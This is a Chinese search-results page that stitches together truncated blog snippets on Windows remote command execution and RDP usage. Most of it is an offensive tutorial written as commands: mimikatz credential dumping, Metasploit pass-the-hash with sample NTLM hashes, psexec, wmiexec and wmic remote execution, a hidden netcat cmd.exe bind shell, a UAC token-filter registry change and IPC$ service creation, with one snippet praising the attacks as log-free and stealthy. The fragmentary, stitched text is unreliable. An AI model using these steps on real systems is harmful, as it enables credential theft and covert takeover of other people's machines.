精华内容
下载资源
问答
  • Windows远程执行命令

    千次阅读 2020-01-21 18:16:39
    Windows远程命令执行 1、psexec.exe远程执行命令 psexec \\192.168.30.128 -u Administrator -p 123456789 cmd.exe 这里一开始登陆是另一个管理员账号,但是一直被拒绝访问,后来把Administrator账号取消...

    环境:Win10、Win7虚拟机

    Windows远程命令执行

    1、psexec.exe远程执行命令

    psexec \\192.168.30.128 -u Administrator -p 123456789 cmd.exe

    这里一开始登陆的是另一个管理员账号,但是一直被拒绝访问,后来把Administrator账号取消隐藏,一下就连接上。之后看到一篇文章也有一样的情况,只有Administrator账号才能连接,就算是管理员用户组的其他用户也不能连接,UAC的问题。

    2、使用Hash登陆Windows

    mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"

    或者使用wce抓取hash值:

    msf调用payload:

    use exploit/windows/smb/psexec
    show options
    set RHOST 192.168.30.128
    Set SMBPass 0182BD0BD4444BF867CD839BF040D93B:C22B315C040AE6E0EFEE3518D830362B
    set SMBUser Administrator
    show options
    Run

    3、利用wmiexec工具配合进行反弹半交互shell

    cscript.exe //nologo wmiexec.vbs /shell 192.168.30.128 Administrator 123456789

    还可以单条命令执行

    4、WMI执行命令方式,无回显

    wmic /node:192.168.30.128 /user:Administrator /password:123456789  process call create "cmd.exe /c ipconfig>c:\result.txt"

    执行成功后可以在被控制的机器里面找到执行结果的文件

    5、nc远程执行

    先在被控机器上开启监听,-L:让监听者在连接多次掉线时仍坚持监听,-d:让nc隐藏运行,-e:指定要运行的程序,-p:监听的端口

    nc.exe -L -d -e cmd.exe -p 5555

    控制端运行nc64.exe 192.168.30.128 5555

     

    展开全文
  • 直接在运行界面输入或者建立bat文件,把数据放在里面运行就OK mstsc /w:1650 /h:1000 /w 指的远程桌面宽度(被控端) /h 指的远程桌面高度(被控端)

    直接在运行界面输入或者建立bat文件,把数据放在里面运行就OK

    mstsc /w:1650 /h:1000
    

    /w 指的远程桌面的宽度(被控端)
    /h 指的远程桌面的高度(被控端)

    展开全文
  • windows远程控制基本命令。远程控制必须熟练常用命令
  • PAGE / NUMPAGES windows远程桌面连接命令和一些常用cmd命令 远程桌面连接命令 mstsc /v: 50 /console :/: Tj Bh:F'Rk cmd 运行 command 删除文件 rd 文件名/S q_gK 0 创建文件 MD 文件名 rP _M(\ 1. ...
  • 主屏幕显示器分辨率范围会大于扩展屏分辨率,这样我们打开远程桌面时候,远程桌面全屏显示时基本没有很好调整大小,这里我们可以使用mstsc命令来强制远程桌面打开时所适配分辨率大小。 以分辨率为1920*...

    生活中我们一定概率下会使用多块显示器来做更好的显示,比如我现在标配的笔记本+显示器,由于有些时候主屏显示和扩展屏显示配置不同,主屏幕的显示器分辨率的范围会大于扩展屏分辨率,这样我们打开远程桌面的时候,远程桌面全屏显示时基本没有很好的调整大小,这里我们可以使用mstsc命令来强制远程桌面打开时所适配的分辨率大小。

    在这里插入图片描述

    以分辨率为1920*1080大小连接远程桌面
    mstsc /w 1920 /h 1080

    展开全文
  • Windows远程执行cmd命令的方法

    万次阅读 2019-09-10 22:16:48
    WMI执行命令(普通权限可以进行hash传递): 无回显执行:wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>c:\result.txt" 利用wmiexec工具配合进行反弹半...

    觉得对自己有用 于是就记录下来了

    先说下IIS7远程链接无法连接怎么解决方法!

    先来讲下正常远程连接的的方法:

    想要进行远程桌面连接,可以同时按住键盘上的windows+R键,调出运行对话框,然后在打开里边输入远程桌面连接命令 mstsc ;

    输入远程桌面连接命令mstsc之后,按回车键或者“确定”打开远程桌面连接对话框,我们输入远程电脑或者服务IP地址,然后点击连接即可 !

    点击链接之后,我们输入远程电脑的登录用户名以及密码即可成功连接了。

    但是,可以成功连接对方的前提是我们远程桌面连接对方电脑需要设置允许进行远程协助以及允许其他电脑进行远程桌面连接,获取相应权限;而且我们还要知道对方电脑的服务IP地址,一般默认端口是3389,如果对方修改了默认端口,需要在进行远程桌面连接时以“ip地址:端口号”的形式连接;同时对方电脑的账户需要密码,有了相应的账号密码才能进行。

    使用微软自带的远程桌面连接也如此麻烦,还不如直接使用远程桌面连接软件

    主要这里易操作,并且在运维的时候很好管理,支持批量操作的哈!

    这里推荐个自己用的工具,下载地址: 服务器批量管理工具


    WMI执行命令(普通权限可以进行hash传递):

    无回显执行:wmic /node:192.168.1.158 /user:cbd666 /password:adexx!@#QWE process call create "cmd.exe /c ipconfig>c:\result.txt"

    利用wmiexec工具配合进行反弹半交互shell:cscript.exe //nologo wmiexec.vbs /shell 192.168.1.158 Administrator adexx!@#QWE

    上面两条命令走的都是135端口,这里的个好处是 攻击无日志,同时攻击脚本无需写入到磁盘,具有极高的隐蔽性!


    2.使用Hash直接登录Windows(HASH传递):

    抓取windows hash值,得到administrator的hash:

    598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF

    win2008系统以后默认不存储LM hash,所以这里同样可以 32个0来代替LM hash,这里不一定需要32个0,只需要前32位是存在的即可

    00000000000000000000000000000000:2D20D252A479F485CDF5E171D93985BF

    然后利用msf中psexec模块进行HASH传递:

    msf调用payload:
    use exploit/windows/smb/psexec
    show options
    set RHOST 192.168.81.129
    set SMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF
    set SMBUser Administrator
    show options
    run
    

    3. mimikatz传递hash方式连接+at计划任务执行命令:

    mimikatz.exe privilege::debug "sekurlsa::pth /domain:. /user:administrator /ntlm:2D20D252A479F485CDF5E171D93985BF" 
    //传递hash
    dir \\192.168.1.185\c$
    

    4.psexec.exe远程执行命令

    psexec /accepteula //接受许可协议
    sc delete psexesvc
    psexec \\192.168.1.185 -u cbd666 -p adexx!@#QWE cmd.exe
    

    Server 2008以及2012中UAC影响着PSEXEC使用!


    5.winrm远程执行命令

    //肉机上面快速启动winrm服务,并绑定到5985端口:
    winrm quickconfig -q
    winrm set winrm/config/Client @{TrustedHosts="*"}
    netstat -ano|find "5985"
    
    //客户端连接方式:
    winrs -r:http://192.168.1.152:5985 -u:cbd666 -p:adexx!@#QWE "whoami /all"
    winrs -r:http://192.168.1.152:5985 -u:cbd666 -p:adexx!@#QWE cmd
    
    //LocalAccountTokenFilterPolicy键,也就是UAC问题,普通管理员登录后也是高权限
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
    winrs -r:http://192.168.1.152:5985 -u:cbd666 -p:adexx!@#QWE "whoami /groups"
    

    6.IPC命令配合sc命令

    net use \\192.168.17.138\c$ "adexx!@#QWE" /user:cbd666
    net use
    dir \\192.168.17.138\c$
    copy test.exe \\192.168.17.138\c$
    sc \\192.168.17.138 create test binpath= "c:\test.exe"
    sc \\192.168.17.138 start test
    sc \\192.168.17.138 del test
    

    这个IPC管道配合SC实际上就是等价于psexec,只不过这里psexec工具直接帮我们自动化完成了这两步!

    上面的话自己再讲一点,当我们进行了HASH 传递之后,实际上就是利用 NTLM 身份认证机制来进行验证的,那么只要我们通过了验证,在走445端口的时候会默认验证的NTLM身份,所以说只要HASH传递之后,以上的工具都是相通的,比如你net use \\192.168.17.138 /u:a\cbd666 adexx!@#QWE,直接cscript.exe //nologo wmiexec.vbs /shell 10.10.10.21则直接可以获取到一个半交互式的shell!

    Pass The Hash的工具还有很多,但是大多本质是相同的。

    比如:

    Smbmap
    CrackMapExec
    Smbexec
    Metasploit(exploit/windows/smb/psexec_psh )
    wmiexec
    Invoke-WMIExec
    Invoke-SMBExec
    mimikatz(Overpass-the-hash)

    展开全文
  • windows,使用 winrm 即可—-A 机器远程连接 B—-在 A 机器(Linux)上安装模块:pip install pywinrm在 B 机器上配置 winrm 服务相关配置,使其支持远程控制:(winrm 服务是 windows 一种方便远程管理服务;...
  • 一、远程执行命令方式及对应...二、9种远程执行cmd命令的方法: 1.WMI执行命令方式,无回显: wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>d:\resu...
  • windows远程执行cmd命令的各方式

    千次阅读 2019-11-14 17:31:32
    1.WMI执行命令方式,无回显: wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>d:\result.txt" ...抓取windows hash值,得到administrator...
  • 1、打开电脑,【Win + R】这是打开运行的命令。到时候我们输入远程命令的时候会用上 2、输入远程连接命令【 mstsc 】这样就可以快速连接 3、输入用户名,密码,连接远程服务器 4、下图是本地显示远程桌面...
  • rdesktop Linux远程Windows命令

    千次阅读 2015-01-07 11:23:41
    rdesktop是一个在Unix/Linux下访问Windows远程桌面客户端程序,rdesktop目前已支持Win7,Win8没有用过还不知道是否支持。通过使用rdesktop所实现远程桌面协议(RDP),用户可以在Unix/Linux系统中远程访问...
  • 对于经常使用的远程桌面连接命令mstsc远程管理电脑或者服务器人来说,远程桌面连接命令mstsc使用很简单。但是对于从来没有接触过远程桌面连接命令的人来说,首次使用可能连需要进行设置都不清楚。我们这里将远程...
  • 一、远程执行命令方式及对应端口:IPC$+AT 445...5986(HTTPS)二、9种远程执行cmd命令的方法:1.WMI执行命令方式,无回显:wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe ...
  • windows 远程连接 复制命令无法使用

    千次阅读 2015-08-20 09:10:25
    windows 远程连接 做项目时候需要远程连接机器 比如说, 在阿里云上新建了一个windows ...远程复制命令无法使用 有时候需要复制本地文本到远程机器上 发现时好时坏 解决方法 一种是把现在打开一些编辑窗
  • 通常在用于远程协调时,会需要用到一个Windows平台非常常用的远程命令行工具包,在该包中存在scp等命令允许远程执行命令,如拷贝或执行其他对应脚本等。 下载地址和相关介绍参见如下: Downloading winscp...
  • 现在有很多小伙伴们都需要使用电脑远程桌面...下面为大家带来windows7电脑系统www.ylmfu.com远程桌面命令的使用方法。 远程桌面命令使用方法: 1、打开电脑,按下win+r键打开运行命令,如图所示: 2、输入远程连接...
  • JAVA执行 Windows命令 实现远程关机     需求是这样,用户想通过点击页面上 指定关闭某一台唤醒类设备(电脑),当然设备肯定不止一台,那么我是这么处理,请看下文: (温馨提示: 专业版系统亲...
  • #net use //查看正在连接网络 #net use * /del /y //重置远程链接网络
  • Linux下远程连接windows,执行命令 - Feng______专栏 - 博客频道 - CSDN.NEThttp://blog.csdn.net/feng______/article/details/31535693 Python实现linux/windows通用批量‘命令/上传/下载’小工具 - 奋进K - ...
  • 我试图用python脚本从一台windows机器(这台机器安装了python26)远程到另一台windows机器(这台机器没有安装python)。我通过谷歌搜索发现WMI模块非常好。所以我试着用这个。以下是我代码:class WindowsMachine:def ...
  • 如果只指定管理员才有执行ipc$权限net share IPC$ /unlimited /grant:administrators,full 二、在cmd下使用以下命令远程重启服务器,提示“拒绝访问”,一般是由于没有权限导致D:\>shutdow...
  • ghost win7系统用户反映不知道怎么使用Windows远程桌面命令,还有打开远程桌面的命令之后的使用。下面小编就来详细介绍一下通过Windows计算机的远程桌面连接来管理远程计算机和入侵渗透测试控制服务器,通过远程桌面...
  • python远程控制windows cmd命令

    千次阅读 2020-03-05 16:25:47
    python远程控制windows cmd命令1. 被控制的远程windows开启winrm service 基础配置2. 用python中pywinrm库实现对远程windows的控制 1. 被控制的远程windows开启winrm service 基础配置 在cmd中配置 winrm ...
  • 常用:1. mstsc /v: 192.168.0.1 连接数满了之后使用:2....Mstsc 命令参考Updated: September 28, 2007 Creates connections to terminal servers or other remote computers, edits an ex...
  • Windows启动远程抓包命令

    千次阅读 2017-07-20 21:53:48
    Windows启动远程抓包命令进入Wireshark安装目录D:\Program Files (x86)\wireshark >执行:wireshark -B 1 -k -i rpcap://[192.168.10.188]:2020/eth0命令解析:该命令为抓取192.168.10.188主机eth0网口报文,...
  • Shadow Brokers泄露多个Windows 远程漏洞利用工具,可以利用SMB、RDP服务成功入侵服务器,可以覆盖全球 70% Windows 服务器,且POC已公开,任何人都可以直接下载并远程攻击利用。 二、漏洞级别 漏洞级别...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 6,703
精华内容 2,681
关键字:

windows远程的命令